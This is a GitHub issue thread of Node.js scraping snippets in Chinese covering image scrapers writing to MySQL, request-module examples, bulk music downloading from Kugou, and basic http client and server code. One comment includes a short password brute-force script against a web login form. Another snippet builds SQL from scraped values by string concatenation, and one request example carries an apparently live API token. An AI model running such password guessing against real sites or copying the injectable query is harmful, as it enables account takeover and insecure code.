node原生模块爬虫和request爬虫方案
Wscats opened this issue · 5 comments
Wscats commented
原生模块爬虫
//原生http模块,用于请求文件或者创建服务器
var http = require("http");
//原生fs模块,用于读写文件
var fs = require("fs")
//调用cheerio模块,类似于jquery
var cheerio = require("cheerio")
//调用mysql第三方模块
var mysql = require("mysql")
//进行数据库连接
var connection = mysql.createConnection({
host: 'localhost', //localhost
user: 'test',
password: '123456789',
database: 'laoyao'
});
//执行连接
connection.connect();
//此函数用于获取需要被爬虫的网页DOM结构
function download(url, callback) {
http.get(url, function(res) {
var data = "";
res.on('data', function(chunk) {
data += chunk
})
res.on('end', function() {
callback(data);
})
})
}
download("http://www.mmjpg.com/", function(data) {
//将网页信息交给cheerio处理,类似于jquery处理DOM结构
var $ = cheerio.load(data);
var imgArr = [];
//遍历图片信息,并执行存储
$('img').each(function(index, ele) {
var src = $(ele).attr("src");
//把数据插入到数据库
connection.query('INSERT INTO `meizi`(`src`) VALUES ("' + src + '")', function(error, results, fields) {
if(error) throw error;
});
imgArr.push(src);
})
//执行下载图片
downloadImg(imgArr)
})
var i = 0;
function downloadImg(imgArr) {
var lenth = imgArr.length;
var writerStream = fs.createWriteStream('img/'+i+'.jpg');
http.get(imgArr[i], function(res) {
res.pipe(writerStream);
if(i<lenth){
i++;
//递归执行图片下载,确保每一张图片下载完再下载下一张
downloadImg(imgArr)
}else{
return;
}
})
}
Wscats commented
注意要遍历生成多个写入流,不然有可能下载文件写入不成功
for(let i = 0; i < imgs.length; i++) {
var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
download(imgs, i, imgStream)
}
完整代码,记得创建img文件夹
var http = require("http");
var fs = require("fs");
//类似于 jQ
const cheerio = require("cheerio");
const queryStr = require("querystring");
var postData = queryStr.stringify({
"msg": "Hello!"
})
//发送http的 request 请求
var request = http.request({
hostname: "www.ivsky.com",
port: 80,
method: "POST",
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': postData.length
}
}, function(response) {
var datas = "";
var imgs = [];
response.on("data", function(chunk) {
datas += chunk;
})
response.on("end", function() {
const $ = cheerio.load(datas);
$("img").each(function(idx, dom) {
imgs.push($(dom).attr("src"))
})
// 遍历创建对应的 可写流
for(let i = 0; i < imgs.length; i++) {
var imgStream = fs.createWriteStream(`./img/vks${i}.jpg`);
download(imgs, i, imgStream)
}
})
})
request.on("error", function(err) {
console.log('problem with request: ' + err.message)
})
request.write(postData)
request.end();
function download(imgs, i, imgStream) {
http.get(imgs[i], function(res) {
res.pipe(imgStream);
})
}
//注意加end方法 结束请求
//req.end()必须被调用,即使没有在请求体内写入任何数据
//也必须调用。因为这表示已经完成HTTP请求
Wscats commented
在pipe之前添加on('error',fn)可以监听错误,在后面添加on('close',fn)可以监听完成
var s = fs.createWriteStream(`./images/${f}/${i}`)
request(url).on('error', (err) => {
console.log(err)
}).pipe(s).on('close', () => {
console.log('成功!')
})
参考文档
Wscats commented
安装并引用request模块
const request = require('request');
详细配置的写法
request({
method: 'GET',
url: 'https://xxx/config/all',
headers: {
'Host': 'api.veilpark.com',
'mid': '8678385b7d1eb259377973ee02cd9d52618fc0f7',
'Accept': '*/*',
'Authorization': 'token 40101431f0c64e83839a56c2069b1a63jcrk8on1',
'Proxy-Connection': 'keep-alive',
'Accept-Language': 'zh-Hans;q=1',
'cversion': '4400',
'Content-Type': 'application/json',
'User-Agent': 'maskpark/4.4 (iPhone; iOS 9.3.1; Scale/2.00)',
'Connection': 'keep-alive',
'client': 'ios'
},
form:{}
}, (error, response, body) => {
if(!error && response.statusCode == 200) {
var info = JSON.parse(body);
console.log(info);
} else {
console.log("请求出错");
}
})
网页暴力破解
const request = require('request');
const async = require('async');
async.each(
//密码字典
['1', '2', '3'],
(item, callback) => {
hack(item, function() {
callback(null)
})
},
() => {
console.log('done');
}
);
function hack(password, cb) {
request({
method: 'POST',
url: 'http://xxx/login',
headers: {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',
},
form: {
'AdminName': 'xxxx',
'PassWord': password
}
}, (error, response, body) => {
if(body) {
console.log("破解失败", "无可用密码");
} else {
console.log("破解成功", password);
}
cb()
})
}
其他可以做的思路
Wscats commented
酷狗批量下载音乐
参考1
var request = require('request');
var cheerio = require('cheerio');
var fs = require('fs');
request('http://www.kugou.com/yy/singer/home/3060.html', function(error, response, body) {
//console.log(body)
var $ = cheerio.load(body);
var arr = $('.song_hid');
//console.log(arr);
for(var num = 0; num < arr.length; num = num + 1) {
console.log($(arr[num]).attr("value"));
//计算字符串的长度
console.log($(arr[num]).attr("value").length);
var length = $(arr[num]).attr("value").length;
//找出第一个|的位置在哪里
console.log($(arr[num]).attr("value").indexOf("|"));
var index = $(arr[num]).attr("value").indexOf("|");
console.log($(arr[num]).attr("value").substring(index + 1, length - 7))
var hash = $(arr[num]).attr("value").substring(index + 1, length - 7);
request('http://www.kugou.com/yy/index.php?r=play/getdata&hash=' + hash, function(error, response, body) {
console.log(JSON.parse(body).data.play_url);
var mp3 = JSON.parse(body).data.play_url;
var audio_name = JSON.parse(body).data.audio_name;
request(mp3).pipe(fs.createWriteStream(audio_name + '.mp3'));
});
}
})
参考2
//1.爬取歌手网页
//2.分析网页,并获取该歌手所有歌曲的id
//3.根据id来拼接url,获取歌曲的下载地址
//4.执行下载
var request = require("request");
var cheerio = require("cheerio");
var fs = require("fs");
var mysql = require('mysql');
var connection = mysql.createConnection({
host: 'localhost',
user: 'wscats',
password: '123456',
database: 'kugou'
});
connection.connect(); //进行连接
request("http://www.kugou.com/singer/3060.html", (err, res, body) => {
//console.log(body)
var $ = cheerio.load(body);
var arr = $(".song_hid");
$(".song_hid").each(function(i, e) {
console.log($(e).attr("value").split("|")[1]);
var link = $(e).attr("value").split("|")[1];
var name = $(e).attr("value").split("|")[0];
request(`http://wwwapi.kugou.com/yy/index.php?r=play/getdata&hash=${link}`, function(err, res, body) {
if(body) {
var url = JSON.parse(body).data.play_url;
console.log(url);
connection.query('INSERT INTO song SET ?', {
name: name,
url: url
}, function(error, results, fields) {
if(error) throw error;
console.log(results);
});
//connection.end();
}
//request(mp3).pipe(fs.createWriteStream(name + '.mp3'));
})
})
})
Wscats commented
原生http.request模拟客户端请求
const http = require('http');
const querystring = require('querystring');
const postData = querystring.stringify({
'msg': 'helloworld'
});
const options = {
hostname: 'localhost',
port: 8877,
path: '/',
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': Buffer.byteLength(postData)
}
};
const req = http.request(options, (res) => {
console.log(`状态码: ${res.statusCode}`);
console.log(`响应头: ${JSON.stringify(res.headers)}`);
res.setEncoding('utf8');
res.on('data', (chunk) => {
console.log(`响应主体: ${chunk}`);
});
res.on('end', () => {
console.log('响应中已无数据');
});
});
req.on('error', (e) => {
console.error(`请求遇到问题: ${e.message}`);
});
// 将数据写入请求主体。
req.write(postData);
req.end();
原生http.creatrServer创建服务器
const http = require('http');
const fs = require('fs');
http.createServer((req, res) => {
res.setHeader('Access-Control-Allow-Origin', '*');
res.setHeader('Access-Control-Allow-Headers', 'Origin, X-Requested-With, Content-Type, Accept');
req.pipe(res);
}).listen(8877);